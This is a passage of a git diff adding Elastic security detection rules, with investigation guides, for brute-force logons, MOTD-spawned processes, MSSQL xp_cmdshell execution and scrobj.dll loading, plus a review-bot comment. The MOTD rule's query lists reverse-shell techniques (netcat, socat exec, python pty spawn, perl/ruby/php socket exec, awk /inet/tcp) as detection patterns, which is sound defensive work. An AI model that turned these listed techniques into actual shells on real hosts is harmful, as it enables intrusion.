This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by winlog.computer_name, source.ip with maxspan=5s\n [authentication where event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and user.id != null and \n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and \n not winlog.event_data.TargetUserSid : \"S-1-0-0\" and not user.id : \"S-1-0-0\" and \n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n [authentication where event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\"]\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + }, 
+ { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.Status", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetUserSid", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "4e85dc8a-3e41-40d8-bc28-91af7ac6cf60", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 10 + }, + "id": "4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_10", + "type": "security-rule" +} \ No newline at end of file 
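Review bot: The `"setup"` text tells users to populate `event.ingested` "for this rule to work effectively", but the attributes block declares no `timestamp_override` (the other rules in this diff set `"timestamp_override": "event.ingested"`), so the advice does not apply to the rule as written. Either add `"timestamp_override": "event.ingested",` before `"type": "eql"`, or, if the omission is intentional for this sequence rule, replace the setup paragraph with one sentence saying the rule evaluates on `@timestamp`. Separately, `winlog.logon.type` is declared with `"type": "unknown"` in `required_fields` although the query filters on it (`winlog.logon.type : "Network"`); declaring it as `keyword` would let the required-fields check actually validate the mapping that the sequence depends on.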
diff --git a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_8.json b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_8.json new file mode 100644 index 00000000000..44aba506413 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_8.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the \"/etc/update-motd.d/\" and \"/usr/lib/update-notifier/\" directories. These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. This rule detects the execution of potentially malicious processes through the MOTD utility.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Process Spawned from MOTD Detected", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where event.type == \"start\" and event.action : (\"exec\", \"exec_event\") and\nprocess.parent.executable : (\"/etc/update-motd.d/*\", \"/usr/lib/update-notifier/*\") and (\n (process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.args : (\"-i\", \"-l\")) or (process.parent.name == \"socat\" and process.parent.args : \"*exec*\"))) or\n (process.name : (\"nc\", \"ncat\", \"netcat\", \"nc.openbsd\") and process.args_count >= 3 and \n not process.args : (\"-*z*\", \"-*l*\")) or\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or \n (process.name in (\"openssl\", \"telnet\"))\n) and \nnot (\n (process.parent.args : \"--force\") or\n (process.args : (\"/usr/games/lolcat\", \"/usr/bin/screenfetch\")) or\n (process.parent.name == \"system-crash-notification\")\n)\n", + "references": [ + 
"https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "4ec47004-b34a-42e6-8003-376a123ea447", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "4ec47004-b34a-42e6-8003-376a123ea447_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_110.json b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_110.json new file mode 100644 index 00000000000..60c1cadc910 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_110.json 
@@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default, thus, it's important to review the context of it's use.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution via MSSQL xp_cmdshell Stored Procedure", + "note": "## Triage and analysis\n\n### Investigating Execution via MSSQL xp_cmdshell Stored Procedure\n\nMicrosoft SQL Server (MSSQL) has procedures meant to extend its functionality, the Extended Stored Procedures. These procedures are external functions written in C/C++; some provide interfaces for external programs. This is the case for xp_cmdshell, which spawns a Windows command shell and passes in a string for execution. Attackers can use this to execute commands on the system running the SQL server, commonly to escalate their privileges and establish persistence.\n\nThe xp_cmdshell procedure is disabled by default, but when used, it has the same security context as the MSSQL Server service account, which is often privileged.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line to determine if the command executed is potentially harmful or malicious.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n\n### False positive analysis\n\n- This mechanism can be used legitimately, but it brings inherent risk. The security team must monitor any activity of it. If recurrent tasks are being executed using this mechanism, consider adding exceptions \u2014 preferably with a full command line.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that SQL servers are not directly exposed to the internet. If there is a business justification for such, use an allowlist to allow only connections from known legitimate sources.\n- Disable the xp_cmdshell stored procedure.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"sqlservr.exe\" and \n (\n (process.name : \"cmd.exe\" and \n not process.args : (\"\\\\\\\\*\", \"diskfree\", \"rmdir\", \"mkdir\", \"dir\", \"del\", \"rename\", \"bcp\", \"*XMLNAMESPACES*\", \n \"?:\\\\MSSQL\\\\Backup\\\\Jobs\\\\sql_agent_backup_job.ps1\", \"K:\\\\MSSQL\\\\Backup\\\\msdb\", \"K:\\\\MSSQL\\\\Backup\\\\Logins\")) or \n \n (process.name : \"vpnbridge.exe\" or ?process.pe.original_file_name : \"vpnbridge.exe\") or \n\n (process.name : \"certutil.exe\" or ?process.pe.original_file_name == \"CertUtil.exe\") or \n\n (process.name : \"bitsadmin.exe\" or ?process.pe.original_file_name == \"bitsadmin.exe\")\n )\n", + "references": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "4ed493fc-d637-4a36-80ff-ac84937e5461", + "setup": "## Setup\n\nIf enabling an EQL rule 
on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.001", + "name": "SQL Stored Procedures", + "reference": "https://attack.mitre.org/techniques/T1505/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "4ed493fc-d637-4a36-80ff-ac84937e5461_110", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_111.json b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_111.json new file mode 100644 index 00000000000..488be07ab86 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_111.json 
@@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default, thus, it's important to review the context of it's use.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution via MSSQL xp_cmdshell Stored Procedure", + "note": "## Triage and analysis\n\n### Investigating Execution via MSSQL xp_cmdshell Stored Procedure\n\nMicrosoft SQL Server (MSSQL) has procedures meant to extend its functionality, the Extended Stored Procedures. These procedures are external functions written in C/C++; some provide interfaces for external programs. This is the case for xp_cmdshell, which spawns a Windows command shell and passes in a string for execution. Attackers can use this to execute commands on the system running the SQL server, commonly to escalate their privileges and establish persistence.\n\nThe xp_cmdshell procedure is disabled by default, but when used, it has the same security context as the MSSQL Server service account, which is often privileged.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line to determine if the command executed is potentially harmful or malicious.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n\n### False positive analysis\n\n- This mechanism can be used legitimately, but it brings inherent risk. The security team must monitor any activity of it. If recurrent tasks are being executed using this mechanism, consider adding exceptions \u2014 preferably with a full command line.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that SQL servers are not directly exposed to the internet. If there is a business justification for such, use an allowlist to allow only connections from known legitimate sources.\n- Disable the xp_cmdshell stored procedure.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"sqlservr.exe\" and \n (\n (process.name : \"cmd.exe\" and \n not process.args : (\"\\\\\\\\*\", \"diskfree\", \"rmdir\", \"mkdir\", \"dir\", \"del\", \"rename\", \"bcp\", \"*XMLNAMESPACES*\", \n \"?:\\\\MSSQL\\\\Backup\\\\Jobs\\\\sql_agent_backup_job.ps1\", \"K:\\\\MSSQL\\\\Backup\\\\msdb\", \"K:\\\\MSSQL\\\\Backup\\\\Logins\")) or \n \n (process.name : \"vpnbridge.exe\" or ?process.pe.original_file_name : \"vpnbridge.exe\") or \n\n (process.name : \"certutil.exe\" or ?process.pe.original_file_name == \"CertUtil.exe\") or \n\n (process.name : \"bitsadmin.exe\" or ?process.pe.original_file_name == \"bitsadmin.exe\")\n )\n", + "references": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "4ed493fc-d637-4a36-80ff-ac84937e5461", + "setup": "## Setup\n\nIf enabling an EQL rule 
on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.001", + "name": "SQL Stored Procedures", + "reference": "https://attack.mitre.org/techniques/T1505/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "4ed493fc-d637-4a36-80ff-ac84937e5461_111", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_107.json b/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_107.json new file mode 100644 index 00000000000..c0d49a0b507 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_107.json 
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies scrobj.dll loaded into unusual Microsoft processes. This usually means a malicious scriptlet is being executed in the target process.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.library-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Script Object Execution", + "query": "any where host.os.type == \"windows\" and \n (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and \n (?dll.name : \"scrobj.dll\" or ?file.name : \"scrobj.dll\") and \n process.executable : (\"?:\\\\Windows\\\\System32\\\\*.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\*.exe\") and \n not process.executable : (\n \"?:\\\\Windows\\\\System32\\\\cscript.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\cscript.exe\",\n \"?:\\\\Windows\\\\system32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\system32\\\\taskhostw.exe\",\n \"?:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\windows\\\\SysWOW64\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\system32\\\\wscript.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\wscript.exe\",\n \"?:\\\\Windows\\\\System32\\\\mshta.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\cmd.exe\", \n \"?:\\\\Windows\\\\System32\\\\OpenWith.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WMIADAP.exe\",\n \"?:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.010", + "name": "Regsvr32", + "reference": "https://attack.mitre.org/techniques/T1218/010/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_107", + "type": "security-rule" +} \ No newline at end of file diff --git 